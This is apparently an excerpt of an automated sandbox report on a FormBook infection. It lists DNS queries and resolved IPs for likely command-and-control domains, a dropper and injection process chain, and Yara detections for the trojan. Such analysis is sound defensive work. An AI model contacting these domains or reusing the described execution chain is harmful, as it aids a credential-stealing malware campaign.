                                                              Mar 20, 2023 17:51:26.421905994 CET53514418.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:51:34.164959908 CET4917753192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:51:34.197314024 CET53491778.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:51:42.216943026 CET4972453192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:51:42.247035027 CET53497248.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:51:49.884217978 CET6145253192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:51:50.032006979 CET53614528.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:51:58.059444904 CET6532353192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:51:58.112246037 CET53653238.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:52:06.919426918 CET5148453192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:52:07.043114901 CET53514848.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:52:16.333122969 CET6344653192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:52:16.358932018 CET53634468.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:52:17.446403027 CET5675153192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:52:17.492475033 CET53567518.8.8.8192.168.2.5
                                                              Mar 20, 2023 17:52:25.764822006 CET5503953192.168.2.58.8.8.8
                                                              Mar 20, 2023 17:52:25.884392023 CET53550398.8.8.8192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Mar 20, 2023 17:51:05.616214037 CET192.168.2.58.8.8.80x82a4Standard query (0)www.white-hat.ukA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:10.996087074 CET192.168.2.58.8.8.80x2effStandard query (0)www.gritslab.comA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:18.648199081 CET192.168.2.58.8.8.80xa7e2Standard query (0)www.bitservicesltd.comA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:26.386713982 CET192.168.2.58.8.8.80x32b8Standard query (0)www.222ambking.orgA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:34.164959908 CET192.168.2.58.8.8.80x9d86Standard query (0)www.energyservicestation.comA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:42.216943026 CET192.168.2.58.8.8.80x9c78Standard query (0)www.younrock.comA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:49.884217978 CET192.168.2.58.8.8.80xcc3aStandard query (0)www.thewildphotographer.co.ukA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:58.059444904 CET192.168.2.58.8.8.80xaf85Standard query (0)www.shapshit.xyzA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:52:06.919426918 CET192.168.2.58.8.8.80xbcdfStandard query (0)www.thedivinerudraksha.comA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:52:16.333122969 CET192.168.2.58.8.8.80x4dc3Standard query (0)www.fclaimrewardccpointq.shopA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:52:17.446403027 CET192.168.2.58.8.8.80xca52Standard query (0)www.fclaimrewardccpointq.shopA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:52:25.764822006 CET192.168.2.58.8.8.80xb97bStandard query (0)www.un-object.comA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Mar 20, 2023 17:51:05.659106016 CET8.8.8.8192.168.2.50x82a4No error (0)www.white-hat.ukwhite-hat.ukCNAME (Canonical name)IN (0x0001)false
                                                              Mar 20, 2023 17:51:05.659106016 CET8.8.8.8192.168.2.50x82a4No error (0)white-hat.uk94.176.104.86A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:11.019247055 CET8.8.8.8192.168.2.50x2effNo error (0)www.gritslab.comgritslab.comCNAME (Canonical name)IN (0x0001)false
                                                              Mar 20, 2023 17:51:11.019247055 CET8.8.8.8192.168.2.50x2effNo error (0)gritslab.com78.141.192.145A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:18.673597097 CET8.8.8.8192.168.2.50xa7e2No error (0)www.bitservicesltd.com161.97.163.8A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:26.421905994 CET8.8.8.8192.168.2.50x32b8No error (0)www.222ambking.org91.195.240.94A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:34.197314024 CET8.8.8.8192.168.2.50x9d86No error (0)www.energyservicestation.com213.145.228.111A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:42.247035027 CET8.8.8.8192.168.2.50x9c78No error (0)www.younrock.com81.17.29.149A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk72.14.185.43A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk72.14.178.174A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk45.79.19.196A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk45.56.79.23A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk45.33.23.183A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk45.33.2.79A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk96.126.123.244A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk173.255.194.134A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk45.33.30.197A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk45.33.20.235A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk45.33.18.44A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:50.032006979 CET8.8.8.8192.168.2.50xcc3aNo error (0)www.thewildphotographer.co.uk198.58.118.167A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:51:58.112246037 CET8.8.8.8192.168.2.50xaf85No error (0)www.shapshit.xyz199.192.30.147A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:52:07.043114901 CET8.8.8.8192.168.2.50xbcdfNo error (0)www.thedivinerudraksha.comthedivinerudraksha.comCNAME (Canonical name)IN (0x0001)false
                                                              Mar 20, 2023 17:52:07.043114901 CET8.8.8.8192.168.2.50xbcdfNo error (0)thedivinerudraksha.com85.187.128.34A (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:52:16.358932018 CET8.8.8.8192.168.2.50x4dc3Name error (3)www.fclaimrewardccpointq.shopnonenoneA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:52:17.492475033 CET8.8.8.8192.168.2.50xca52Name error (3)www.fclaimrewardccpointq.shopnonenoneA (IP address)IN (0x0001)false
                                                              Mar 20, 2023 17:52:25.884392023 CET8.8.8.8192.168.2.50xb97bNo error (0)www.un-object.comun-object.comCNAME (Canonical name)IN (0x0001)false
                                                              Mar 20, 2023 17:52:25.884392023 CET8.8.8.8192.168.2.50xb97bNo error (0)un-object.com192.185.17.12A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.white-hat.uk
                                                              • www.gritslab.com
                                                              • www.bitservicesltd.com
                                                              • www.222ambking.org
                                                              • www.energyservicestation.com
                                                              • www.younrock.com
                                                              • www.thewildphotographer.co.uk
                                                              • www.shapshit.xyz
                                                              • www.thedivinerudraksha.com
                                                              • www.un-object.com

                                                              Statistics

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:17:50:22
                                                              Start date:20/03/2023
                                                              Path:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\Desktop\u8QPnVhq0N.exe
                                                              Imagebase:0x400000
                                                              File size:299979 bytes
                                                              MD5 hash:7DE990046A20E6666627273589B014A5
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low

                                                              General

                                                              Target ID:1
                                                              Start time:17:50:22
                                                              Start date:20/03/2023
                                                              Path:C:\Users\user\AppData\Local\Temp\mcwfy.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f
                                                              Imagebase:0x400000
                                                              File size:95232 bytes
                                                              MD5 hash:6CB712E482D150A185F713D75314A75A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 33%, ReversingLabs
                                                              Reputation:low

                                                              General

                                                              Target ID:2
                                                              Start time:17:50:22
                                                              Start date:20/03/2023
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7fcd70000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Target ID:3
                                                              Start time:17:50:23
                                                              Start date:20/03/2023
                                                              Path:C:\Users\user\AppData\Local\Temp\mcwfy.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\AppData\Local\Temp\mcwfy.exe
                                                              Imagebase:0x400000
                                                              File size:95232 bytes
                                                              MD5 hash:6CB712E482D150A185F713D75314A75A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              Reputation:low

                                                              General

                                                              Target ID:4
                                                              Start time:17:50:31
                                                              Start date:20/03/2023
                                                              Path:C:\Windows\explorer.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\Explorer.EXE
                                                              Imagebase:0x7ff69bc80000
                                                              File size:3933184 bytes
                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              General

                                                              Target ID:5
                                                              Start time:17:50:47
                                                              Start date:20/03/2023
                                                              Path:C:\Windows\SysWOW64\autoconv.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                              Imagebase:0x13c0000
                                                              File size:851968 bytes
                                                              MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              General

                                                              Target ID:6
                                                              Start time:17:50:47
                                                              Start date:20/03/2023
                                                              Path:C:\Windows\SysWOW64\cmstp.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                              Imagebase:0x12a0000
                                                              File size:82944 bytes
                                                              MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com

                                                              Disassembly

                                                              No disassembly